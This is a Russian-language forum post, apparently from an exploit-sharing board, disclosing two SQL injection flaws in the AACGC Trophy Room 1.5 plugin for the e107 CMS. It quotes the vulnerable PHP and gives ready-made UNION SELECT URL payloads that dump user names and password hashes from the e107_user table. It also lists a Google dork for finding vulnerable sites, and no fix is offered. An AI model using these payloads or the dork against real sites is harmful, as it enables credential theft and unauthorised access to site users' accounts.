11.12.2010, 17:01
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
AACGC Trophy Room V1.5
Необохдимы права администратора, SQL Injection:
/admin_edit_event.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);
}
...
if ([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_trophy_room"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"event_id =[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();
...[/COLOR][/COLOR]
Пример:
Код:
http://e107/e107_plugins/aacgc_trophy_room/admin_edit_event.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user--
SQL Injection:
/Event_Details.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];
unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);
}
}
...
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_trophy_room"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE event_id =[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();
...[/COLOR][/COLOR]
Пример:
Код:
http://e107/e107_plugins/aacgc_trophy_room/Event_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user--
Путь:
http://e107/e107_plugins/aacgc_trophy_room/admin_menu.php
Дорк:inurl:e107_plugins/aacgc_trophy_room/
|
|
|